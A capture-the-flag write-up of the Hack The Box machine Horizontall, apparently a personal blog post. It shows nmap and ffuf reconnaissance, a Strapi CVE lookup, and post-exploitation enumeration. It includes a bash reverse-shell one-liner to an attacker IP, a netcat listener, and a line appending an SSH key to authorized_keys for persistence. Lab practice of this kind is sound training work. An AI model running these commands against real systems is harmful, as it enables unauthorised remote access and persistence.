2022-01-12
Start
nmap -sV -sC 10.10.11.105
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-07 22:46 MST
Nmap scan report for 10.10.11.105
Host is up (0.086s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.03 secondsadd dns to /etc/hosts
echo "10.10.11.105 horizontall.htb" >> /etc/hostsLets see what we have
$ curl -v http://horizontall.htb
* Trying 10.10.11.105:80...
* Connected to horizontall.htb (10.10.11.105) port 80 (#0)
> GET / HTTP/1.1
> Host: horizontall.htb
> User-Agent: curl/7.79.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Sat, 08 Jan 2022 05:53:48 GMT
< Content-Type: text/html
< Content-Length: 901
< Last-Modified: Fri, 30 Jul 2021 07:25:57 GMT
< Connection: keep-alive
< ETag: "6103a985-385"
< Accept-Ranges: bytes
<
horizontall
* Connection #0 to host horizontall.htb left intactok, running nginx, but lets see what files
$ ffuf -u http://horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://horizontall.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 901, Words: 43, Lines: 2]
favicon.ico [Status: 200, Size: 4286, Words: 8, Lines: 1]
. [Status: 301, Size: 194, Words: 7, Lines: 8]
:: Progress: [37050/37050] :: Job [1/1] :: 462 req/sec :: Duration: [0:01:20] :: Errors: 1 ::not much there…lets try hosts:
$ curl -s -H "Host: doesntexist.horizontall.htb" http://horizontall.htb | wc -c
194
$ ffuf -c -u http://horizontall.htb/ -H "Host: FUZZ.horizontall.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 194
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://horizontall.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.horizontall.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 194
________________________________________________
www [Status: 200, Size: 901, Words: 43, Lines: 2]
api-prod [Status: 200, Size: 413, Words: 76, Lines: 20]
:: Progress: [114441/114441] :: Job [1/1] :: 465 req/sec :: Duration: [0:04:08] :: Errors: 0 ::Ah, api-prod.horizontall.htb lets check this one out, add it to /etc/hosts
$ sed "s/horizontall.htb/horizontall.htb api-prod.horizontall.htb/g" -i /etc/hostsnow lets see….
curl -v http://api-prod.horizontall.htb
* Trying 10.10.11.105:80...
* Connected to api-prod.horizontall.htb (10.10.11.105) port 80 (#0)
> GET / HTTP/1.1
> Host: api-prod.horizontall.htb
> User-Agent: curl/7.79.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Sat, 08 Jan 2022 06:17:49 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 413
< Connection: keep-alive
< Vary: Origin
< Content-Security-Policy: img-src 'self' http:; block-all-mixed-content
< Strict-Transport-Security: max-age=31536000; includeSubDomains
< X-Frame-Options: SAMEORIGIN
< X-XSS-Protection: 1; mode=block
< Last-Modified: Wed, 02 Jun 2021 20:00:29 GMT
< Cache-Control: max-age=60
< X-Powered-By: Strapi
<
Welcome to your API
Welcome.
* Connection #0 to host api-prod.horizontall.htb left intact and now the ffuf
$ ffuf -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://api-prod.horizontall.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
# [Status: 200, Size: 413, Words: 76, Lines: 20]
[Status: 200, Size: 413, Words: 76, Lines: 20]
# [Status: 200, Size: 413, Words: 76, Lines: 20]
# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 413, Words: 76, Lines: 20]
# This work is licensed under the Creative Commons [Status: 200, Size: 413, Words: 76, Lines: 20]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 413, Words: 76, Lines: 20]
# on at least 1 host [Status: 200, Size: 413, Words: 76, Lines: 20]
# [Status: 200, Size: 413, Words: 76, Lines: 20]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 413, Words: 76, Lines: 20]
# Copyright 2007 James Fisher [Status: 200, Size: 413, Words: 76, Lines: 20]
# [Status: 200, Size: 413, Words: 76, Lines: 20]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 413, Words: 76, Lines: 20]
# directory-list-2.3-big.txt [Status: 200, Size: 413, Words: 76, Lines: 20]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 413, Words: 76, Lines: 20]
reviews [Status: 200, Size: 507, Words: 21, Lines: 1]
users [Status: 403, Size: 60, Words: 1, Lines: 1]
admin [Status: 200, Size: 854, Words: 98, Lines: 17]
Reviews [Status: 200, Size: 507, Words: 21, Lines: 1]
Users [Status: 403, Size: 60, Words: 1, Lines: 1]
Admin [Status: 200, Size: 854, Words: 98, Lines: 17]
REVIEWS [Status: 200, Size: 507, Words: 21, Lines: 1]
[Status: 200, Size: 413, Words: 76, Lines: 20]
look at some of them
curl http://api-prod.horizontall.htb/reviews/
[{"id":1,"name":"wail","description":"This is good service","stars":4,"created_at":"2021-05-29T13:23:38.000Z","updated_at":"2021-05-29T13:23:38.000Z"},{"id":2,"name":"doe","description":"i'm satisfied with the product","stars":5,"created_at":"2021-05-29T13:24:17.000Z","updated_at":"2021-05-29T13:24:17.000Z"},{"id":3,"name":"john","description":"create service with minimum price i hop i can buy more in the futur","stars":5,"created_at":"2021-05-29T13:25:26.000Z","updated_at":"2021-05-29T13:25:26.000Z"}]
curl http://api-prod.horizontall.htb/admin/
Strapi Admin
curl http://api-prod.horizontall.htb/users/
{"statusCode":403,"error":"Forbidden","message":"Forbidden"}poking around, I end up seeing the http://api-prod.horizontall.htb/admin/auth/login and it shows a logo for “strapi”
so…that gives us an idea to look for!
https://www.cvedetails.com/cve/CVE-2019-18818/
now we need to be able to exploit this….exploit-db!
https://www.exploit-db.com/exploits/50239
blind exploit! time for a reverse shell…..
Reverse Shell Cheat Sheet
nc -lvnp 2345
bash -c 'bash -i >& /dev/tcp/10.10.14.10/2345 0>&1'Now we have shell
cd /home
ls
cd developer
cat user.txtnow lets get a direct ssh connection
echo "ssh-rsa AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA kali" >> ~/.ssh/authorized_keysNow I can direct ssh in with:
ssh -i id_rsa-horizontall strapi@horizontall.htbnow lets see whats going on
$ netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1809/node /usr/bin/
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
$We see port 8000 as available
$ curl http://localhost:8000
Laravel